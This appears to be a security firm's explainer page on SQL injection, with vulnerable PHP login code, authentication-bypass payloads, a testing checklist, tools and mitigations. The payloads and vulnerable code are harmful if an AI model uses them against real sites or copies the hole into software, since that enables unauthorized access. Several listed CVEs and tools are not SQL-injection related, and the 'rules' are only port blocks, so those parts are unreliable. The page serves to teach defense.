10 Jan, 2023

SQL injection

SQL injection (SQLi) is a type of security vulnerability in which an attacker is able to insert malicious code into a SQL statement in order to gain unauthorized access to a database.

Full Description: SQL injection is a type of web application security vulnerability in which an attacker is able to insert malicious SQL code into a web application’s input fields in order to gain unauthorized access to a database. This can allow the attacker to steal sensitive data, manipulate the contents of a database, or even gain control of the entire system. SQL injection attacks are possible when an application does not properly validate user input or does not use prepared statements with parameterized queries.

 

Examples:

 

• An attacker may attempt to enter the following SQL code into a login form: ' OR 1=1 -- which would cause the application to return all rows from the users table, potentially allowing the attacker to gain access to sensitive information.

• An attacker may also attempt to use a union-based SQL injection attack to extract data from multiple tables in a database by adding additional SQL statements to the original query.

 

Here is an example of vulnerable SQL code that is vulnerable to SQL injection:

 

<?php
$username = $_POST[“username”];
$password = $_POST[“password”];

$query = “SELECT * FROM users WHERE username = ‘$username’ AND password = ‘$password'”;
$result = mysqli_query($connection, $query);

if (mysqli_num_rows($result) > 0) {
// login successful
} else {
// login failed
}
?>

 

In this example, the PHP script is trying to authenticate a user by checking the username and password they provided against the records in a database table called “users”. The problem with this code is that it directly incorporates user input ($username and $password) into the SQL query without properly validating or sanitizing it. This means that if an attacker were to enter a malicious string into the username and password fields, they could potentially cause the query to execute unintended commands.

 

For example, an attacker could enter the following into the username field: admin' -- which would cause the query to become:

 

SELECT * FROM users WHERE username = ‘admin’ –‘ AND password = ‘whatever_password_entered’

 

This query would comment out the rest of the query, bypassing the password check, hence login would be successful. This can lead to unauthorized access to the system.

To mitigate this vulnerability, user input should be validated and sanitized, and prepared statements with parameterized queries should be used to build the SQL query. This way, the parameterized query would look something like this:

 

$stmt = $connection->prepare(“SELECT * FROM users WHERE username = ? AND password = ?”);
$stmt->bind_param(“ss”, $username, $password);
$stmt->execute();b

 

This way even if attacker tries to provide malicious input, it will not be executed as a query and would be treated as a string, preventing SQL injection attacks.

 

SQL injection vulnerability can be used for privilege escalation. A technique called “blind SQL injection” is often used to gain access to more sensitive data by modifying the original query and injecting code to request data from the server in a Boolean context. This method is often used to extract sensitive data such as usernames and passwords, credit card numbers, and personal information.

 

Methodology for Testing Vulnerability: Testing for SQL injection vulnerabilities can be done manually or using automated tools. The following is a checklist of steps that can be followed to test for SQL injection vulnerabilities:

 

• Identify all input fields in the web application, including forms, query strings, and cookies.

• Attempt to enter various SQL injection payloads, such as single quotes, double quotes, and logical operators, into each input field.

• Observe the application’s behavior and look for any unexpected results, such as error messages or data leakage.

• Use automated tools to automate these steps and scan a website, Application

 

Tools:

 

• SQLMap

• SQLNinja

• Havij

• SQL Injection Lab

• sqlol

• sqliX

• sqliv

• sqldict

• sqldump

• sqlitebrowser

• sqlninja

• sqlite

• sqlcipher

• sqliteadmin

• sqliteman

• sqlite_analyzer

 

Popular Exploits:

 

• SQL injection attacks are commonly used to extract sensitive information from a database, such as credit card numbers, personal information, or login credentials.

• SQL injection can also be used to modify the contents of a database, such as adding, modifying, or deleting records.

• An attacker may use SQL injection to gain unauthorized access to a system by injecting code that grants them elevated privileges, such as administrator access.

 

Top CVES related to this vulnerability:

 

• CVE-2019-19781

• CVE-2019-16759

• CVE-2018-7600

• CVE-2017-9805

• CVE-2015-5352

 

Top News related to the vulnerability:

 

Car companies massively exposed to web vulnerabilities

JSON syntax hack allowed SQL injection payloads to be smuggled past WAFs

Zendesk Explore flaws opened the door to account pillage

Sophos fixes SQL injection vulnerability in UTM appliance

 

Where to Test for this Vulnerability:

 

• Penetration testing on web application

• Owasp Zap and burp suite

• Websites that has a form, login page, search pages, etc

 

Useful Courses, Practice and Videos:

 

• OWASP (Open Web Application Security Project) offers resources and training on how to prevent and mitigate SQL injection attacks

• The SANS Institute offers a variety of courses on web application security, including a course on SQL injection prevention and mitigation

The SQL Injection Wiki provides a wealth of information on different types of SQL injection attacks and how to prevent them

 

Books:

 

• “SQL Injection Attacks and Defense” by Justin Clarke

• “Hacking Exposed Web Applications” by Joel Scambray, Mike Shema, and Caleb Sima

• “Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws” by Dafydd Stuttard and Marcus Pinto

 

Payloads:

 

• ‘ or 1=1 —

• ‘ or 1=1#

• ‘ or 1=1/*

• ‘ or ‘a’=’a

• ” or “a”=”a

 

Sigma rules / firewall rules to block or stop vulnerability:

 

• block incoming traffic to port 1433 (SQL Server)

• block incoming traffic to port 3306 (MySQL)

• block incoming traffic to port 1521 (Oracle)

• block incoming traffic to port 5432 (PostgreSQL)

 

Useful Services:

 

• Web Application Firewall (WAF) can block known SQL injection attacks

• Regular software patching and updates can help prevent vulnerabilities from being exploited

 

Mitigations:

 

• Use prepared statements with parameterized queries instead of building SQL queries with string concatenation.

• Validate user input and sanitize it if necessary.

• Limit privileges to the minimum required for the application to function properly.

• Regularly audit and monitor your database and application logs for unusual activity.

• Keep software and system updated.

• Use web application firewall, to block known attack

• Use encoding and escaping when necessary.

 

SQL injection is a serious security vulnerability that can lead to the compromise of sensitive data and even the complete takeover of a system. It is important for developers and system administrators to be aware of this threat and take steps to prevent and mitigate it. The use of prepared statements with parameterized queries, input validation and sanitization, and regular security audits can greatly reduce the risk of a successful SQL injection attack.

 

Other Services

Ready to secure?

Let's get in touch